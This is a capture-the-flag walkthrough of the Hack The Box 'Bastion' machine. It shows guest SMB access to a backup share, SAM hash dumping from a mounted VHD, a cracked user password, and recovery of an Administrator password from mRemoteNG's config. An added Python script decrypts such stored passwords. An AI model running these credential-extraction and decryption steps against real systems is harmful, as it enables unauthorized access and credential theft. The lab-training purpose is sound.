HTB - Bastion

Bastion

Getting Root:

  1. Enumerate SMB and find guest read/write access to the Backups share

  2. Mount the *.vhd file found in the Backups folder and copy out the SAM and SYSTEM hives

  3. Crack the NT hash for the user and SSH to the box

  4. mRemoteNG is installed on the box; it stores saved session passwords encrypted with a static, well-known string

  5. Decrypt the stored Administrator password using a tool from GitHub

  6. SSH to the box using the Administrator account

Nmap

# Nmap 7.80 scan initiated Wed Mar  4 23:29:48 2020 as: nmap -sC -sV -p- -oA nmap/Bastion 10.10.10.134    
Nmap scan report for 10.10.10.134
Host is up (0.045s latency).
Not shown: 65522 closed ports
PORT      STATE SERVICE      VERSION
22/tcp    open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey: 
|   2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
|   256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_  256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -17m43s, deviation: 34m35s, median: 2m13s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Bastion
|   NetBIOS computer name: BASTION\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-03-05T05:33:50+01:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-03-05T04:33:46
|_  start_date: 2020-03-04T11:34:41

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Mar  4 23:31:40 2020 -- 1 IP address (1 host up) scanned in 112.85 seconds

Enumerating SMB

Looks like a guest session works: we can read IPC$, and we have READ and WRITE access to the Backups share.

smbmap -H 10.10.10.134 -d BASTION -u 'justme'
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.134...
[+] IP: 10.10.10.134:445	Name: 10.10.10.134                                      
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	Backups                                           	READ, WRITE	
	C$                                                	NO ACCESS	Default share
	.                                                  
	fr--r--r--                3 Sun Dec 31 19:03:58 1600	InitShutdown
	fr--r--r--                4 Sun Dec 31 19:03:58 1600	lsass
	fr--r--r--                3 Sun Dec 31 19:03:58 1600	ntsvcs
	fr--r--r--                3 Sun Dec 31 19:03:58 1600	scerpc
	fr--r--r--                1 Sun Dec 31 19:03:58 1600	Winsock2\CatalogChangeListener-2ec-0
	fr--r--r--                1 Sun Dec 31 19:03:58 1600	Winsock2\CatalogChangeListener-1d0-0
	fr--r--r--                3 Sun Dec 31 19:03:58 1600	epmapper
	fr--r--r--                3 Sun Dec 31 19:03:58 1600	LSM_API_service
	fr--r--r--                3 Sun Dec 31 19:03:58 1600	eventlog
	fr--r--r--                1 Sun Dec 31 19:03:58 1600	Winsock2\CatalogChangeListener-370-0
	fr--r--r--                3 Sun Dec 31 19:03:58 1600	atsvc
	fr--r--r--                1 Sun Dec 31 19:03:58 1600	Winsock2\CatalogChangeListener-358-0
	fr--r--r--                4 Sun Dec 31 19:03:58 1600	wkssvc
	fr--r--r--                3 Sun Dec 31 19:03:58 1600	spoolss
	fr--r--r--                1 Sun Dec 31 19:03:58 1600	openssh-ssh-agent
	fr--r--r--                3 Sun Dec 31 19:03:58 1600	trkwks
	fr--r--r--                3 Sun Dec 31 19:03:58 1600	W32TIME_ALT
	fr--r--r--                1 Sun Dec 31 19:03:58 1600	vgauth-service
	fr--r--r--                1 Sun Dec 31 19:03:58 1600	Winsock2\CatalogChangeListener-608-0
	fr--r--r--                4 Sun Dec 31 19:03:58 1600	srvsvc
	fr--r--r--                1 Sun Dec 31 19:03:58 1600	Winsock2\CatalogChangeListener-25c-0
	fr--r--r--                1 Sun Dec 31 19:03:58 1600	Winsock2\CatalogChangeListener-254-0
	fr--r--r--                1 Sun Dec 31 19:03:58 1600	Winsock2\CatalogChangeListener-5b8-0
	IPC$                                              	READ ONLY	Remote IPC

Mount the remote share

mkdir smbfiles

mount -t cifs //10.10.10.134/Backups smbfiles/
Password for root@//10.10.10.134/Backups:  # Just hit enter

root@kdeali:~/HackTheBox/Bastion# cd smbfiles/
root@kdeali:~/HackTheBox/Bastion/smbfiles# ls
etlLxkiRzT  note.txt  pmQWhHvsDA  SDT65CB.tmp  WindowsImageBackup

Interesting Files

Enumerating the Backups share turns up two .vhd files (virtual hard disks) inside the WindowsImageBackup tree.

ls -l
total 5330560
-rwxr-xr-x 1 root root   37761024 Feb 22  2019 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
-rwxr-xr-x 1 root root 5418299392 Feb 22  2019 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
-rwxr-xr-x 1 root root       1186 Feb 22  2019 BackupSpecs.xml
-rwxr-xr-x 1 root root       1078 Feb 22  2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml   
-rwxr-xr-x 1 root root       8930 Feb 22  2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml
-rwxr-xr-x 1 root root       6542 Feb 22  2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml
-rwxr-xr-x 1 root root       2894 Feb 22  2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml
-rwxr-xr-x 1 root root       1488 Feb 22  2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml
-rwxr-xr-x 1 root root       1484 Feb 22  2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml
-rwxr-xr-x 1 root root       3844 Feb 22  2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml
-rwxr-xr-x 1 root root       3988 Feb 22  2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml
-rwxr-xr-x 1 root root       7110 Feb 22  2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml
-rwxr-xr-x 1 root root    2374620 Feb 22  2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml

Mounting the VHD (Virtual Hard Disk) image

# Make a directory to mount the VHD
mkdir vhd

# Mount the larger image (the Windows volume) with guestmount: -i lets libguestfs find and mount
# the filesystems inside the disk, -r mounts it read-only so the backup is not modified
guestmount -v -i -r -a /root/HackTheBox/Bastion/smbfiles/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd vhd/

# guestmount info and help:
guestmount: FUSE module for libguestfs
guestmount lets you mount a virtual machine filesystem
Copyright (C) 2009-2019 Red Hat Inc.
Usage:
  guestmount [--options] mountpoint
Options:
  -a|--add image       Add image
  -c|--connect uri     Specify libvirt URI for -d option
  --dir-cache-timeout  Set readdir cache timeout (default 5 sec)
  -d|--domain guest    Add disks from libvirt guest
  --echo-keys          Don't turn off echo for passphrases
  --fd=FD              Write to pipe FD when mountpoint is ready
  --format[=raw|..]    Force disk format for -a option
  --fuse-help          Display extra FUSE options
  -i|--inspector       Automatically mount filesystems
  --help               Display help message and exit
  --key selector       Specify a LUKS key
  --keys-from-stdin    Read passphrases from stdin
  --live               Connect to a live virtual machine
  -m|--mount dev[:mnt[:opts[:fstype]] Mount dev on mnt (if omitted, /)
  --no-fork            Don't daemonize
  -n|--no-sync         Don't autosync
  -o|--option opt      Pass extra option to FUSE
  --pid-file filename  Write PID to filename
  -r|--ro              Mount read-only
  --selinux            For backwards compat only, does nothing
  -v|--verbose         Verbose messages
  -V|--version         Display version and exit
  -w|--rw              Mount read-write
  -x|--trace           Trace guestfs API calls

Getting a hashdump from the image

# cd Windows/System32/config/
root@kdeali:~/HackTheBox/Bastion/vhd/Windows/System32/config# ls -la
total 74740
drwxrwxrwx 1 root root    12288 Feb 22  2019 .
drwxrwxrwx 1 root root   655360 Feb 22  2019 ..
-rwxrwxrwx 2 root root    28672 Feb 22  2019 BCD-Template
-rwxrwxrwx 2 root root    25600 Feb 22  2019 BCD-Template.LOG
-rwxrwxrwx 2 root root 30932992 Feb 22  2019 COMPONENTS
-rwxrwxrwx 2 root root  1048576 Feb 22  2019 COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.0.regtrans-ms
-rwxrwxrwx 2 root root  1048576 Feb 22  2019 COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.1.regtrans-ms
-rwxrwxrwx 2 root root  1048576 Feb 22  2019 COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.2.regtrans-ms
-rwxrwxrwx 2 root root    65536 Feb 22  2019 COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.blf
-rwxrwxrwx 2 root root    65536 Feb 22  2019 COMPONENTS{6cced2ed-6e01-11de-8bed-001e0bcd1824}.TM.blf
-rwxrwxrwx 2 root root   524288 Feb 22  2019 COMPONENTS{6cced2ed-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms  
-rwxrwxrwx 2 root root   524288 Jul 14  2009 COMPONENTS{6cced2ed-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms
-rwxrwxrwx 2 root root     1024 Apr 11  2011 COMPONENTS.LOG
-rwxrwxrwx 2 root root   262144 Feb 22  2019 COMPONENTS.LOG1
-rwxrwxrwx 2 root root        0 Jul 13  2009 COMPONENTS.LOG2
-rwxrwxrwx 1 root root   262144 Feb 22  2019 DEFAULT
-rwxrwxrwx 1 root root     1024 Apr 11  2011 DEFAULT.LOG
-rwxrwxrwx 2 root root    91136 Feb 22  2019 DEFAULT.LOG1
-rwxrwxrwx 2 root root        0 Jul 13  2009 DEFAULT.LOG2
drwxrwxrwx 1 root root        0 Jul 13  2009 Journal
drwxrwxrwx 1 root root        0 Feb 22  2019 RegBack
-rwxrwxrwx 1 root root   262144 Feb 22  2019 SAM
-rwxrwxrwx 1 root root     1024 Apr 11  2011 SAM.LOG
-rwxrwxrwx 2 root root    21504 Feb 22  2019 SAM.LOG1
-rwxrwxrwx 2 root root        0 Jul 13  2009 SAM.LOG2
-rwxrwxrwx 1 root root   262144 Feb 22  2019 SECURITY
-rwxrwxrwx 1 root root     1024 Apr 11  2011 SECURITY.LOG
-rwxrwxrwx 2 root root    21504 Feb 22  2019 SECURITY.LOG1
-rwxrwxrwx 2 root root        0 Jul 13  2009 SECURITY.LOG2
-rwxrwxrwx 1 root root 24117248 Feb 22  2019 SOFTWARE
-rwxrwxrwx 1 root root     1024 Apr 11  2011 SOFTWARE.LOG
-rwxrwxrwx 2 root root   262144 Feb 22  2019 SOFTWARE.LOG1
-rwxrwxrwx 2 root root        0 Jul 13  2009 SOFTWARE.LOG2
-rwxrwxrwx 1 root root  9699328 Feb 22  2019 SYSTEM
-rwxrwxrwx 1 root root     1024 Apr 11  2011 SYSTEM.LOG
-rwxrwxrwx 2 root root   262144 Feb 22  2019 SYSTEM.LOG1
-rwxrwxrwx 2 root root        0 Jul 13  2009 SYSTEM.LOG2
drwxrwxrwx 1 root root     4096 Nov 20  2010 systemprofile
drwxrwxrwx 1 root root     4096 Feb 22  2019 TxR

# Copy the SAM and SYSTEM hives out of the mounted image to your working directory

Using impacket's secretsdump

Only the hash for the user L4mpje is worth cracking: the Administrator and Guest entries carry the NT hash of an empty password, which is recognisable by its 31d6cfe0... prefix.

# impacket-secretsdump -sam SAM -system SYSTEM local
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
[*] Cleaning up... 

Cracking the Hash

I used hashes.org, which is a free online password recovery tool, and submitted the hash for user L4mpje and I got the following:

26112010952d963c8dc4217daec986d9:bureaulampje

Getting the User Flag

As noted in the nmap output, this is a Windows box, but it is running an SSH server, so the cracked password gives a shell directly.

# ssh L4mpje@10.10.10.134
L4mpje@10.10.10.134's password: 

Microsoft Windows [Version 10.0.14393]                                                                                          
(c) 2016 Microsoft Corporation. All rights reserved.                                                                            

l4mpje@BASTION C:\Users\L4mpje>whoami                                                                                           
bastion\l4mpje                                                                                                                  

l4mpje@BASTION C:\Users\L4mpje\Desktop>dir /a                                                                                   
 Volume in drive C has no label.                                                                                                
 Volume Serial Number is 0CB3-C487                                                                                              

 Directory of C:\Users\L4mpje\Desktop                                                                                           

22-02-2019  15:27    <DIR>          .                                                                                           
22-02-2019  15:27    <DIR>          ..                                                                                          
22-02-2019  15:26               282 desktop.ini                                                                                 
23-02-2019  09:07                32 user.txt                                                                                    
               2 File(s)            314 bytes                                                                                   
               2 Dir(s)  11.316.252.672 bytes free                                                                              

l4mpje@BASTION C:\Users\L4mpje\Desktop>  

Privilege Escalation

There is an application called mRemoteNG installed.

l4mpje@BASTION c:\Users\L4mpje\AppData\Roaming>dir /a                                                                           
 Volume in drive C has no label.                                                                                                
 Volume Serial Number is 0CB3-C487                                                                                              

 Directory of c:\Users\L4mpje\AppData\Roaming                                                                                   

22-02-2019  14:01    <DIR>          .                                                                                           
22-02-2019  14:01    <DIR>          ..                                                                                          
22-02-2019  13:50    <DIR>          Adobe                                                                                       
22-02-2019  13:52    <DIR>          Microsoft                                                                                   
22-02-2019  14:03    <DIR>          mRemoteNG                                                                                   
               0 File(s)              0 bytes                                                                                   
               5 Dir(s)  11.315.810.304 bytes free  

Exploiting mRemoteNG

A quick Google search for "mRemoteNG exploit" returns the following article, detailing how to abuse the weak credential encryption in this application.

Getting the passwords from the encrypted config

I found the following tool on GitHub. You can read the source code. It's safe.

To run the script, you need the encrypted password string, which is located in the following directory:

c:\Users\L4mpje\AppData\Roaming\mRemoteNG

All you have to do is read the latest XML backup file and copy the string out of the Password attribute.

l4mpje@BASTION c:\Users\L4mpje\AppData\Roaming\mRemoteNG>dir /a                                                                 
 Volume in drive C has no label.                                                                                                
 Volume Serial Number is 0CB3-C487                                                                                              

 Directory of c:\Users\L4mpje\AppData\Roaming\mRemoteNG

22-02-2019  14:03    <DIR>          .                                                                                           
22-02-2019  14:03    <DIR>          ..                                                                                          
22-02-2019  14:03             6.316 confCons.xml                                                                                
22-02-2019  14:02             6.194 confCons.xml.20190222-1402277353.backup                                                     
22-02-2019  14:02             6.206 confCons.xml.20190222-1402339071.backup                                                     
22-02-2019  14:02             6.218 confCons.xml.20190222-1402379227.backup                                                     
22-02-2019  14:02             6.231 confCons.xml.20190222-1403070644.backup                                                     
22-02-2019  14:03             6.319 confCons.xml.20190222-1403100488.backup                                                     
22-02-2019  14:03             6.318 confCons.xml.20190222-1403220026.backup                                                     
22-02-2019  14:03             6.315 confCons.xml.20190222-1403261268.backup                                                     
22-02-2019  14:03             6.316 confCons.xml.20190222-1403272831.backup                                                     
22-02-2019  14:03             6.315 confCons.xml.20190222-1403433299.backup                                                     
22-02-2019  14:03             6.316 confCons.xml.20190222-1403486580.backup                                                     
22-02-2019  14:03                51 extApps.xml                                                                                 
22-02-2019  14:03             5.217 mRemoteNG.log                                                                               
22-02-2019  14:03             2.245 pnlLayout.xml                                                                               
22-02-2019  14:01    <DIR>          Themes                                                                                      
              14 File(s)         76.577 bytes                                                                                   
               3 Dir(s)  11.315.810.304 bytes free       
               
               
# Reading the xml file and extracting the password string
l4mpje@BASTION c:\Users\L4mpje\AppData\Roaming\mRemoteNG>type confCons.xml.20190222-1403486580.backup
<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false" EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false" Protected="GZFZvMqKVfqaCb4DYaCJLOWP1D4TOix6kvJPpP9n9I3iY0wKUddxnQJSKIHscF4BXRnHhScKnXECGoEau8Y7coTs" ConfVersion="2.6">
    <Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="500e7d58-662a-44d4-aff0-3a4f547a3fee" Username="Administrator" Domain="" Password="IsAizowTqaCAO6/2vMwxFtln1qfh+jZfdAI2V7Uve8JoLSRanAXzwFgMkkJbedGpCjRZbdmQIV299FlDCt8ymg==" Hostname="127.0.0.1" Protocol="RDP" PuttySession="Default Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" Rend


# The Password attribute is base64-encoded AES-GCM ciphertext (see the EncryptionEngine and BlockCipherMode attributes above):
Password="IsAizowTqaCAO6/2vMwxFtln1qfh+jZfdAI2V7Uve8JoLSRanAXzwFgMkkJbedGpCjRZbdmQIV299FlDCt8ymg==" 

Decrypting the Password

# ./mremoteng_decrypt.py -s IsAizowTqaCAO6/2vMwxFtln1qfh+jZfdAI2V7Uve8JoLSRanAXzwFgMkkJbedGpCjRZbdmQIV299FlDCt8ymg==  
Password: thXLHM96BeKL0ER2
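The steps in this section (read confCons.xml, pull out the Password attribute, decrypt it) can be turned into a check a defender runs against their own mRemoteNG profiles to find saved credentials that the master password does not really protect. The following is an added example, not part of the original writeup, of mRemoteNG, or of the GitHub decrypt tool used above. It assumes the ConfVersion 2.6 layout: each Password attribute is base64 of salt(16) | nonce(16) | AES-GCM ciphertext | tag(16); the AES-256 key is PBKDF2-HMAC-SHA1 of the master password with the file's KdfIterations and that salt; the salt doubles as associated data; and the master password defaults to the fixed string "mR3m" when the user never set one, which is the "static string" step 4 of the summary refers to. The sample XML is the page's confCons.xml backup with the cut-off node and root element closed so it parses. AES-GCM itself comes from the cryptography package (or pycryptodome); with neither installed the audit reports that it could not attempt decryption rather than guessing.

```python
"""Audit an mRemoteNG confCons.xml for saved credentials that open under a given master password.
Added example for this writeup; not code from mRemoteNG or from the decrypt tool used above."""
import base64
import hashlib
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional

# Constructed sample: the attributes from the confCons.xml backup shown above, with the
# <Node> and the root element closed so the document parses (the page's listing is cut off).
SAMPLE_CONFCONS = """<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false" EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false" Protected="GZFZvMqKVfqaCb4DYaCJLOWP1D4TOix6kvJPpP9n9I3iY0wKUddxnQJSKIHscF4BXRnHhScKnXECGoEau8Y7coTs" ConfVersion="2.6">
    <Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="500e7d58-662a-44d4-aff0-3a4f547a3fee" Username="Administrator" Domain="" Password="IsAizowTqaCAO6/2vMwxFtln1qfh+jZfdAI2V7Uve8JoLSRanAXzwFgMkkJbedGpCjRZbdmQIV299FlDCt8ymg==" Hostname="127.0.0.1" Protocol="RDP" PuttySession="Default Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" />
</mrng:Connections>
"""

# mRemoteNG's built-in master password when the user never sets one (assumption stated in the lead-in).
DEFAULT_MASTER_PASSWORD = "mR3m"


def split_blob(b64: str) -> Dict[str, bytes]:
    """ConfVersion 2.6 layout: salt(16) | nonce(16) | AES-GCM ciphertext | tag(16), base64-encoded."""
    raw = base64.b64decode(b64)
    if len(raw) < 48:
        raise ValueError("blob too short to hold salt, nonce and tag")
    return {"salt": raw[:16], "nonce": raw[16:32], "ciphertext": raw[32:-16], "tag": raw[-16:]}


def derive_key(master_password: str, salt: bytes, iterations: int) -> bytes:
    """PBKDF2-HMAC-SHA1 of the master password with the file's KdfIterations; 256-bit AES key."""
    return hashlib.pbkdf2_hmac("sha1", master_password.encode("utf-8"), salt, iterations, dklen=32)


def aesgcm_backend() -> Optional[str]:
    """Name of an installed AES-GCM implementation, or None when there is none."""
    try:
        import cryptography.hazmat.primitives.ciphers.aead  # noqa: F401
        return "cryptography"
    except ImportError:
        pass
    try:
        import Crypto.Cipher.AES  # noqa: F401  (pycryptodome)
        return "pycryptodome"
    except ImportError:
        return None


def decrypt_password(b64: str, master_password: str, iterations: int) -> Optional[str]:
    """Decrypt one Password attribute. None when no AES-GCM library is installed; raises when
    the authentication tag fails (wrong master password or a tampered blob)."""
    p = split_blob(b64)
    key = derive_key(master_password, p["salt"], iterations)
    backend = aesgcm_backend()
    if backend == "cryptography":
        from cryptography.hazmat.primitives.ciphers.aead import AESGCM
        plain = AESGCM(key).decrypt(p["nonce"], p["ciphertext"] + p["tag"], p["salt"])
    elif backend == "pycryptodome":
        from Crypto.Cipher import AES
        cipher = AES.new(key, AES.MODE_GCM, nonce=p["nonce"])
        cipher.update(p["salt"])                 # the salt doubles as associated data
        plain = cipher.decrypt_and_verify(p["ciphertext"], p["tag"])
    else:
        return None
    return plain.decode("utf-8")


def audit(xml_text: str, master_password: str = DEFAULT_MASTER_PASSWORD) -> List[Dict[str, Optional[str]]]:
    """List every connection node that stores a password and whether it opens under master_password."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    iterations = int(root.get("KdfIterations", "1000"))
    findings = []
    for node in root.iter("Node"):
        blob = node.get("Password")
        if not blob:
            continue
        try:
            plain = decrypt_password(blob, master_password, iterations)
            status = "recoverable with this master password" if plain is not None else "no AES-GCM library installed"
        except Exception:                        # InvalidTag / ValueError: this key does not open the blob
            plain, status = None, "does not decrypt with this master password"
        findings.append({"name": node.get("Name"), "user": node.get("Username"),
                         "host": node.get("Hostname"), "status": status, "plaintext": plain})
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_CONFCONS):
        print(f'{f["name"]:10} {f["user"]}@{f["host"]}: {f["status"]}')
```

A node that decrypts under the default master password is one that any local reader of the profile (or of a backup of it, as on this box) can recover. Setting a non-default master password changes the PBKDF2 input and stops this; not saving privileged credentials in the profile at all removes the exposure entirely.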

Getting the Root Flag

# ssh Administrator@10.10.10.134
Administrator@10.10.10.134's password: 

Microsoft Windows [Version 10.0.14393]                                                                                          
(c) 2016 Microsoft Corporation. All rights reserved.                                                                            

administrator@BASTION C:\Users\Administrator>whoami                                                                             
bastion\administrator                                                                                                           

administrator@BASTION C:\Users\Administrator>cd desktop                                                                         

administrator@BASTION C:\Users\Administrator\Desktop>dir                                                                        
 Volume in drive C has no label.                                                                                                
 Volume Serial Number is 0CB3-C487                                                                                              

 Directory of C:\Users\Administrator\Desktop                                                                                    

23-02-2019  09:40    <DIR>          .                                                                                           
23-02-2019  09:40    <DIR>          ..                                                                                          
23-02-2019  09:07                32 root.txt                                                                                    
               1 File(s)             32 bytes                                                                                   
               2 Dir(s)  11.315.679.232 bytes free                                                                              

administrator@BASTION C:\Users\Administrator\Desktop>   
